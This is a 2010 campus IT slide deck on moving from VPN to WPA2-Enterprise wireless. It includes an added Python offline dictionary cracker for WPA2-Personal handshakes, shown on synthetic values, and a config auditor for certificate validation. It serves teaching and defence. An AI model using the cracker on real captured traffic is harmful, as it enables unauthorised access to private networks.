No More VPN for Wireless! PDI 2010 Steve Lovaas, ACNS
Wireless With CSU-NET Overview • Technology basics • Wireless security at CSU so far • The new way of doing things: CSU-NET • Step-by-step configuration
Wireless: Where we started • Less controlled than wired network • Anyone can try to connect • Wasn’t designed with ANY security • Early security add-ons (WEP) were poor! • Technology was useful before it was safe… • We should have predicted that
Wireless: Where We’ve Been • Protect our resources • Find malicious users • Protect private traffic • Early hardware didn’t support native crypto • Security standards slow to evolve • Easiest solution: VPN (authenticate & encrypt)
CSU Wireless Security: VPN • Cisco VPN: The OLD Way • Require VPN to reach wired LAN or Internet • Pre-load application and profile • Encrypted tunnel to VPN server • Can sort some by group profile, separate IP space
CSU Wireless Security: VPN • Problems with the VPN approach • Install & maintain • System compatibility • Client vulnerabilities • Licensing $$ • Dropped connections • Waste of IP addresses • Hassle!
CSU Wireless Security: SSL gateway • A newer approach, easier • Application & profile dynamically downloaded • Web based • Compatible with more systems, through firewalls • Sorts on username, Windows OU, etc.
CSU Wireless Security: SSL gateway • Problems with the SSL gateway approach • It’s a lot easier, but… • Java/ActiveX downloads and permissions • Java/ActiveX vulnerabilities • Licensing $$
Wireless Security Standards • Letting the wireless client & AP do the work • First try: WEP (shared-key) = BAD, key recovery is trivial • Next try: WPA = slightly better protocol (TKIP, built to run on WEP-era hardware) • Finally: WPA2 = stronger encryption, too (AES-CCMP) • But in Personal (PSK) mode these all rely on one shared key (a passphrase everyone knows) • And that passphrase can be stolen, or broken offline from a single captured handshake
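Why "broken" is the right word for a shared passphrase: in WPA/WPA2-Personal the Pairwise Master Key is just PBKDF2 of the passphrase and the SSID, and the 4-way handshake puts everything else (MACs, nonces, the EAPOL-Key MIC) on the air. The following is an added example, not code from the slides or from CSU; it derives the keys the standard way and runs an offline dictionary attack against a constructed handshake (the SSID, MAC addresses, nonces, EAPOL frame and wordlist are all synthetic values made up for this demo).

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    Every station on the network derives this same key from the same passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    The first 16 bytes of the PTK are the KCK, which keys the EAPOL-Key MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP MIC: HMAC-SHA1(KCK, EAPOL-Key frame with its MIC field zeroed), first 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, mic, wordlist):
    """Offline dictionary attack: every input here is public on the air except the passphrase."""
    for candidate in wordlist:
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), mic):
            return candidate
    return None


# --- Constructed "capture": synthetic values, not real traffic ---
SSID = "example-psk"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for the second EAPOL-Key message with the MIC field zeroed.
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(0x75 - 4)


def build_capture(passphrase: str) -> bytes:
    """Simulate what a sniffer sees: the MIC the client computed over message 2."""
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_MSG2)


def demo() -> str:
    """Recover a weak passphrase from the constructed handshake with a tiny wordlist."""
    mic = build_capture("sunshine2010")
    wordlist = ["password", "qwerty", "letmein", "sunshine2010", "welcome1"]
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, mic, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The only cost per guess is one PBKDF2 (4096 SHA-1 rounds) plus a handful of HMACs, which is why a passphrase that appears in any wordlist falls quickly. WPA2-Enterprise removes this attack class entirely: there is no shared passphrase, and each session's PMK comes out of the per-user EAP exchange.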
Wireless Security Standards • WPA2 Enterprise = can replace VPN • Finalized in 2004 (IEEE 802.11i) • Centralized authentication (802.1X with a RADIUS server; each user logs in with their own credentials, no shared key) • Strong encryption (AES-CCMP, with per-session keys) • Native to client (built-in supplicant, no extra software to install) • Now part of the base standard (IEEE 802.11-2007) • More compatibility (Win/Mac/Linux/mobile/etc.) • This is CSU-NET!
CSU-NET Architecture • [Diagram; labels: Authenticated, Encrypted, Surfing]
How-To: Prerequisites • Operating system up to date • XP SP3 (or SP2 with patch) • Vista, Windows 7 • Mac OS X since 10.4 • Recent Linux • Wireless card drivers up to date • Download from manufacturer • Must support WPA2
How-To: Settings • Just a few basic settings • Authentication: WPA2-Enterprise • Encryption: AES • Authentication Type: PEAP • Authentication Protocol: MSCHAP v2 • Certificate Authority: Equifax (the root that issued the RADIUS server’s certificate) • Keep “validate server certificate” ON: without it, a rogue AP advertising CSU-NET can collect your MSCHAP v2 credentials • ACNS web site instructions for Win, Mac • Instructions being updated to trust the Equifax CA rather than IPS Servidores
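The two How-To slides above describe the client configuration in words; the block below is an added example (not CSU’s or ACNS’s own instructions) that expresses the same settings as wpa_supplicant network blocks for the “Recent Linux” case and audits them. Both configurations are constructed: the weak one omits server-certificate validation and allows TKIP, the hardened one pins the Equifax root and the RADIUS server name. The certificate path, the identity, and the `domain_suffix_match` value are assumptions, not values from the slides.

```python
import re

# Constructed wpa_supplicant network blocks (examples, not CSU's published config).
WEAK_CONFIG = """
network={
    ssid="CSU-NET"
    key_mgmt=WPA-EAP
    pairwise=TKIP
    eap=PEAP
    identity="user@example.edu"
    password="secret"
    phase2="auth=MSCHAPV2"
    # no ca_cert: the supplicant will accept ANY server certificate
}
"""

HARDENED_CONFIG = """
network={
    ssid="CSU-NET"
    key_mgmt=WPA-EAP
    proto=RSN                       # WPA2 only
    pairwise=CCMP                   # AES, not TKIP
    group=CCMP
    eap=PEAP
    identity="user@example.edu"
    password="secret"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/Equifax_Secure_CA.pem"   # assumed path to the Equifax root
    domain_suffix_match="example.edu"                # assumed RADIUS server name suffix
}
"""


def parse_network(conf: str) -> dict:
    """Pull key=value settings out of the first network={...} block, ignoring # comments."""
    body = re.search(r"network=\{(.*?)\}", conf, re.S).group(1)
    settings = {}
    for raw in body.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip().strip('"')
    return settings


def audit(settings: dict) -> list:
    """Return problems relative to the slide's settings, plus the server-certificate checks."""
    findings = []
    if settings.get("key_mgmt") != "WPA-EAP":
        findings.append("key_mgmt must be WPA-EAP (WPA2-Enterprise, 802.1X), not a pre-shared key")
    if settings.get("proto") != "RSN":
        findings.append("proto should be RSN so the client never falls back to WPA1")
    if "TKIP" in settings.get("pairwise", "CCMP") or "TKIP" in settings.get("group", "CCMP"):
        findings.append("TKIP allowed: encryption should be CCMP (AES) only")
    if settings.get("eap") != "PEAP":
        findings.append("eap should be PEAP")
    if settings.get("phase2") != "auth=MSCHAPV2":
        findings.append("phase2 should be auth=MSCHAPV2")
    if "ca_cert" not in settings:
        findings.append("no ca_cert: RADIUS server certificate is not validated, so a rogue "
                        "AP advertising the same SSID can harvest MSCHAPv2 credentials")
    if not (settings.get("domain_suffix_match") or settings.get("subject_match")):
        findings.append("no domain_suffix_match/subject_match: any certificate from the trusted "
                        "CA would be accepted, not just the campus RADIUS server's")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(parse_network(conf)) or ["OK"])
```

The same checks apply to the Windows and Mac profiles described on the slides: trusting the Equifax root is necessary but not sufficient, since any certificate that chains to that root would otherwise be accepted. Pinning the server name (the `domain_suffix_match` line here, or the server-name field in the Windows PEAP dialog) is what ties the credentials to CSU’s RADIUS server.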